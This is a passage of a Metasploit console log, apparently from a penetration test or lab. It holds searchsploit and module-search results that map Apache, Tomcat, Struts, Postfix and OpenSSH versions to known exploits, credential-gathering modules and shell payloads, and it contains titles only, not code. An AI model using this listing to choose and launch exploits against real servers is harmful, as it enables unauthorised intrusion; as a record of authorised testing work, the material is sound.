553Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
554Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
555Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
556Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY | unix/remote/40347.txt
557Apache mod_wsgi - Information Disclosure | linux/remote/39196.py
558Apache MyFaces - 'ln' Information Disclosure | multiple/remote/36681.txt
559Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting | jsp/webapps/30191.txt
560Apache OFBiz - Admin Creator | multiple/remote/12264.txt
561Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/12330.txt
562Apache OFBiz - Remote Execution (via SQL Execution) | multiple/remote/12263.txt
563Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities | multiple/remote/38230.txt
564Apache OFBiz 16.11.04 - XML External Entity Injection | java/webapps/45673.py
565Apache OFBiz 16.11.05 - Cross-Site Scripting | multiple/webapps/45975.txt
566Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
567Apache Olingo OData 4.0 - XML External Entity Injection | java/webapps/47770.txt
568Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
569Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting | java/webapps/46759.txt
570Apache Portals Pluto 3.0.0 - Remote Code Execution | windows/webapps/45396.txt
571Apache Rave 0.11 < 0.20 - User Information Disclosure | multiple/webapps/24744.txt
572Apache Roller - OGNL Injection (Metasploit) | java/remote/29859.rb
573Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) | linux/webapps/45341.py
574Apache Shindig - XML External Entity Information Disclosure | multiple/remote/38813.txt
575Apache Shiro - Directory Traversal | multiple/remote/34952.txt
576Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit) | multiple/remote/48410.rb
577Apache Sling - Denial of Service | multiple/dos/37487.txt
578Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure | multiple/webapps/39435.txt
579Apache Solr - Remote Code Execution via Velocity Template (Metasploit) | multiple/remote/48338.rb
580Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution | xml/webapps/43009.txt
581Apache Solr 8.2.0 - Remote Code Execution | java/webapps/47572.py
582Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution | multiple/remote/11662.txt
583Apache Spark - (Unauthenticated) Command Execution (Metasploit) | java/remote/45925.rb
584Apache Spark Cluster 1.3.x - Arbitrary Code Execution | linux/remote/36562.txt
585Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit) | multiple/remote/24874.rb
586Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/33142.rb
587Apache Struts - Developer Mode OGNL Execution (Metasploit) | java/remote/31434.rb
588Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) | linux/remote/39756.rb
589Apache Struts - includeParams Remote Code Execution (Metasploit) | multiple/remote/25980.rb
590Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities | multiple/webapps/18452.txt
591Apache Struts - OGNL Expression Injection | multiple/remote/38549.txt
592Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/39919.rb
593Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/43382.py
594Apache Struts 1.2.7 - Error Response Cross-Site Scripting | multiple/remote/26542.txt
595Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit) | multiple/remote/27135.rb
596Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) | multiple/remote/45367.rb
597Apache Struts 2 - Skill Name Remote Code Execution | multiple/remote/37647.txt
598Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) | multiple/remote/44643.rb
599Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities | multiple/webapps/18329.txt
600Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload | java/webapps/37009.xml
601Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting | multiple/remote/35735.txt
602Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution | multiple/remote/44556.py
603Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass | multiple/remote/36426.txt
604Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | multiple/remote/18984.rb
605Apache Struts 2.2.3 - Multiple Open Redirections | multiple/remote/38666.txt
606Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) | linux/remote/45260.py
607Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) | multiple/remote/45262.py
608Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL I | multiple/remote/41614.rb
609Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution | linux/webapps/41570.py
610Apache Struts 2.3.x Showcase - Remote Code Execution | multiple/webapps/42324.py
611Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | linux/remote/42627.py
612Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Exec | multiple/remote/41690.rb
613Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
614Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection | multiple/webapps/44583.txt
615Apache Subversion - Remote Denial of Service | linux/dos/38422.txt
616Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service | linux/dos/38421.txt
617Apache suEXEC - Information Disclosure / Privilege Escalation | linux/remote/27397.txt
618Apache Superset < 0.23 - Remote Code Execution | linux/webapps/45933.py
619Apache Syncope 2.0.7 - Remote Code Execution | windows/webapps/45400.txt
620Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) | windows/remote/47208.rb
621Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
622Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Local Privilege Escalat | windows/local/7264.txt
623Apache Tomcat - 'WebDAV' Remote File Disclosure | multiple/remote/4530.pl
624Apache Tomcat - Account Scanner / 'PUT' Request Command Execution | multiple/remote/18619.txt
625Apache Tomcat - AJP 'Ghostcat File Read/Inclusion | multiple/webapps/48143.py
626Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasp | windows/remote/47073.rb
627Apache Tomcat - Cookie Quote Handling Remote Information Disclosure | multiple/remote/9994.txt
628Apache Tomcat - Form Authentication 'Username' Enumeration | multiple/remote/9995.txt
629Apache Tomcat - WebDAV SSL Remote File Disclosure | linux/remote/4552.pl
630Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripti | multiple/remote/27095.txt
631Apache Tomcat 3.0 - Directory Traversal | windows/remote/20716.txt
632Apache Tomcat 3.1 - Path Revealing | multiple/remote/20131.txt
633Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting | multiple/remote/33379.txt
634Apache Tomcat 3.2 - Directory Disclosure | unix/remote/21882.txt
635Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting | multiple/webapps/10292.txt
636Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree | multiple/remote/21492.txt
637Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure | multiple/remote/21490.txt
638Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure | multiple/remote/21491.txt
639Apache Tomcat 3.x - Null Byte Directory / File Disclosure | linux/remote/22205.txt
640Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure | unix/remote/21853.txt
641Apache Tomcat 3/4 - JSP Engine Denial of Service | linux/dos/21534.jsp
642Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting | windows/webapps/21605.txt
643Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Discl | multiple/remote/31551.txt
644Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting | linux/remote/21604.txt
645Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service | linux/dos/23245.pl
646Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure | unix/remote/21412.txt
647Apache Tomcat 4.1 - JSP Request Cross-Site Scripting | unix/remote/21734.txt
648Apache Tomcat 5 - Information Disclosure | multiple/remote/28254.txt
649Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure | multiple/remote/12343.txt
650Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting | jsp/webapps/30563.txt
651Apache Tomcat 5.5.25 - Cross-Site Request Forgery | multiple/webapps/29435.txt
652Apache Tomcat 5.x/6.0.x - Directory Traversal | linux/remote/29739.txt
653Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scr | multiple/remote/30052.txt
654Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting | multiple/remote/30495.html
655Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disc | multiple/remote/30496.txt
656Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting | jsp/webapps/30189.txt
657Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure | multiple/remote/31130.txt
658Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting | multiple/remote/32138.txt
659Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure | multiple/remote/32137.txt
660Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enu | multiple/remote/33023.txt
661Apache Tomcat 6/7/8/9 - Information Disclosure | multiple/remote/41783.txt
662Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting | linux/remote/35011.txt
663Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation | linux/local/40450.txt
664Apache Tomcat 8/7/6 (RedHat Based Distros) - Local Privilege Escalation | linux/local/40488.txt
665Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
666Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
667Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
668Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | jsp/webapps/42966.py
669Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | windows/webapps/42953.txt
670Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow | linux/remote/5386.txt
671Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow | linux/remote/4162.c
672Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Me | multiple/remote/16317.rb
673Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Meta | multiple/remote/31433.rb
674Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflow (Metasploit) | windows/remote/16798.rb
675Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marsh | php/remote/28713.php
676Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Ex | multiple/remote/46544.py
677Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service | linux/dos/22191.pl
678Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution | windows/remote/21350.pl
679Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
680Apache2Triad 1.5.4 - Multiple Vulnerabilities | php/webapps/42520.txt
681Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation | linux/local/23119.c
682AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution | cgi/webapps/35035.txt
683Bea Weblogic Apache Connector - Code Execution / Denial of Service | windows/remote/6089.pl
684Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure | multiple/remote/19828.txt
685htpasswd Apache 1.3.31 - Local Overflow | linux/local/466.pl
686Joomla! Component com_intuit - Apache Directory listing Download | php/webapps/10811.txt
687NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval | multiple/remote/20595.txt
688Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side | php/dos/44057.md
689Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit) | windows/remote/18897.rb
690PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit) | windows/remote/19231.rb
691RedHat Apache 2.0.40 - Directory Index Default Configuration Error | linux/remote/23296.txt
692RedHat Linux 7.0 Apache - Remote Username Enumeration | linux/remote/21112.php
693Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Executio | linux/remote/34.pl
694-------------------------------------------------------------------------------- ---------------------------------
695Shellcodes: No Results
696msf5 > searchsploit Apache 2.4.10
697[*] exec: searchsploit Apache 2.4.10
698
699-------------------------------------------------------------------------------- ---------------------------------
700 Exploit Title | Path
701-------------------------------------------------------------------------------- ---------------------------------
702Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
703Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
704Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
705Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
706Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
707Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
708Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
709Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
710Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
711Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
712Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
713Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | jsp/webapps/42966.py
714Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | windows/webapps/42953.txt
715Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
716Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Executio | linux/remote/34.pl
717-------------------------------------------------------------------------------- ---------------------------------
718Shellcodes: No Results
719msf5 > search Apache 2.4.10
720
721Matching Modules
722================
723
724 # Name Disclosure Date Rank Check Description
725 - ---- --------------- ---- ----- -----------
726 0 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
727 1 auxiliary/admin/http/tomcat_administration normal No Tomcat Administration Tool Default Access
728 2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal No Tomcat UTF-8 Directory Traversal Vulnerability
729 3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal No TrendMicro Data Loss Prevention 5.5 Directory Traversal
730 4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
731 5 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
732 6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal No Apache Range Header DoS (Apache Killer)
733 7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
734 8 auxiliary/fileformat/odt_badodt 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
735 9 auxiliary/gather/apache_rave_creds normal No Apache Rave User Information Disclosure
736 10 auxiliary/gather/impersonate_ssl normal No HTTP SSL Certificate Impersonation
737 11 auxiliary/scanner/couchdb/couchdb_enum normal Yes CouchDB Enum Utility
738 12 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure
739 13 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal
740 14 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
741 15 auxiliary/scanner/http/apache_optionsbleed 2017-09-18 normal No Apache Optionsbleed Scanner
742 16 auxiliary/scanner/http/apache_userdir_enum normal No Apache "mod_userdir" User Enumeration
743 17 auxiliary/scanner/http/axis_local_file_include normal No Apache Axis2 v1.4.1 Local File Inclusion
744 18 auxiliary/scanner/http/axis_login normal No Apache Axis2 Brute Force Utility
745 19 auxiliary/scanner/http/mod_negotiation_brute normal No Apache HTTPD mod_negotiation Filename Bruter
746 20 auxiliary/scanner/http/mod_negotiation_scanner normal No Apache HTTPD mod_negotiation Scanner
747 21 auxiliary/scanner/http/rewrite_proxy_bypass normal No Apache Reverse Proxy Bypass Vulnerability Scanner
748 22 auxiliary/scanner/http/tomcat_enum normal No Apache Tomcat User Enumeration
749 23 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
750 24 auxiliary/scanner/http/wangkongbao_traversal normal No WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
751 25 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
752 26 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
753 27 exploit/linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution
754 28 exploit/linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution
755 29 exploit/linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution
756 30 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution
757 31 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
758 32 exploit/linux/http/eyesofnetwork_autodiscovery_rce 2020-02-06 excellent Yes EyesOfNetwork AutoDiscovery Target Command Execution
759 33 exploit/linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution
760 34 exploit/linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
761 35 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
762 36 exploit/linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution
763 37 exploit/linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability
764 38 exploit/linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation
765 39 exploit/linux/smtp/apache_james_exec 2015-10-01 normal Yes Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write
766 40 exploit/multi/fileformat/zip_slip 2018-06-05 manual No Generic Zip Slip Traversal Vulnerability
767 41 exploit/multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload
768 42 exploit/multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload
769 43 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
770 44 exploit/multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection
771 45 exploit/multi/http/cisco_dcnm_upload_2019 2019-06-26 excellent Yes Cisco Data Center Network Manager Unauthenticated Remote Code Execution
772 46 exploit/multi/http/shiro_rememberme_v124_deserialize 2016-06-07 excellent No Apache Shiro v1.2.4 Cookie RememberME Deserial RCE
773 47 exploit/multi/http/solr_velocity_rce 2019-10-29 excellent Yes Apache Solr Remote Code Execution via Velocity Template
774 48 exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
775 49 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
776 50 exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection
777 51 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
778 52 exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE
779 53 exploit/multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution
780 54 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
781 55 exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution
782 56 exploit/multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution
783 57 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
784 58 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
785 59 exploit/multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution
786 60 exploit/multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
787 61 exploit/multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution
788 62 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
789 63 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
790 64 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
791 65 exploit/multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution
792 66 exploit/unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution
793 67 exploit/unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution
794 68 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload
795 69 exploit/unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload
796 70 exploit/unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability
797 71 exploit/unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection
798 72 exploit/unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection
799 73 exploit/windows/http/apache_activemq_traversal_upload 2015-08-19 excellent Yes Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload
800 74 exploit/windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding
801 75 exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow
802 76 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
803 77 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
804 78 exploit/windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow
805 79 exploit/windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow
806 80 exploit/windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow
807 81 exploit/windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow
808 82 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
809 83 exploit/windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability
810 84 payload/php/shell_findsock normal No PHP Command Shell, Find Sock
811 85 post/linux/gather/enum_configs normal No Linux Gather Configurations
812 86 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration
813
814
815msf5 > searchsploit Postfix smtpd
816[*] exec: searchsploit Postfix smtpd
817
818Exploits: No Results
819Shellcodes: No Results
820msf5 > searchsploit Postfix
821[*] exec: searchsploit Postfix
822
823------------------------------------------------------------------------------------------- ---------------------------------
824 Exploit Title | Path
825------------------------------------------------------------------------------------------- ---------------------------------
826gld 1.4 - Postfix Greylisting Daemon Remote Format String | linux/remote/934.c
827Postfix 1.1.x - Denial of Service (1) | linux/dos/22981.c
828Postfix 1.1.x - Denial of Service (2) | linux/dos/22982.pl
829Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation | linux/local/6337.sh
830Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service | multiple/dos/6472.c
831Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | linux/remote/34896.py
832Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) | linux/remote/16841.rb
833Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Meta | linux/remote/10023.rb
834Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow | linux/remote/25392.c
835------------------------------------------------------------------------------------------- ---------------------------------
836Shellcodes: No Results
837msf5 > search postfix
838
839Matching Modules
840================
841
842 # Name Disclosure Date Rank Check Description
843 - ---- --------------- ---- ----- -----------
844 0 auxiliary/admin/http/pfadmin_set_protected_alias 2017-02-03 normal Yes Postfixadmin Protected Alias Deletion Vulnerability
845 1 exploit/linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow
846
847
848msf5 > searchsploit OpenSSH 5.1p1
849[*] exec: searchsploit OpenSSH 5.1p1
850
851------------------------------------------------------------------------------------------- ---------------------------------
852 Exploit Title | Path
853------------------------------------------------------------------------------------------- ---------------------------------
854OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
855OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
856OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
857OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
858OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege | linux/local/40962.txt
859OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
860OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
861------------------------------------------------------------------------------------------- ---------------------------------
862Shellcodes: No Results
863msf5 > search OpenSSH
864
865Matching Modules
866================
867
868 # Name Disclosure Date Rank Check Description
869 - ---- --------------- ---- ----- -----------
870 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
871 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
872 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
873 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
874 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
875
876
877msf5 > search SFTP
878
879Matching Modules
880================
881
882 # Name Disclosure Date Rank Check Description
883 - ---- --------------- ---- ----- -----------
884 0 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
885 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
886 2 exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow
887 3 exploit/windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow
888 4 exploit/windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow
889 5 exploit/windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow
890 6 exploit/windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow
891 7 post/windows/gather/credentials/wsftp_client normal No Windows Gather WS_FTP Saved Password Extraction
892
893
894msf5 > linux/remote/45001.py
